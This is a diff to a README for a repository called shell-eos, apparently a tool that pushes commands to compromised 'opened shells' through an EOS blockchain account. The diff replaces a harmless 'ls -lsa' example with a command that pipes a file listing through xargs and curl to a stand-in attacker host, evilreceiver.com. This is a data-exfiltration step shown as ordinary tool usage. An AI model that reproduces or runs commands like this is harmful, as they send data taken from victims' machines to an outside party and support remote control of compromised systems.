pedroelbanquero/shell-eos/README.md

 ## Execute commands in each opened shell

-`python3 payloads/send-eos.py eosaccountname` "ls -lsa"
+`python3 payloads/send-eos.py eosaccountname` "ls -lsa | xargs ... | curl https://evilreceiver.com" .... -d {1}

 ## Publish datasets in a address as a recipient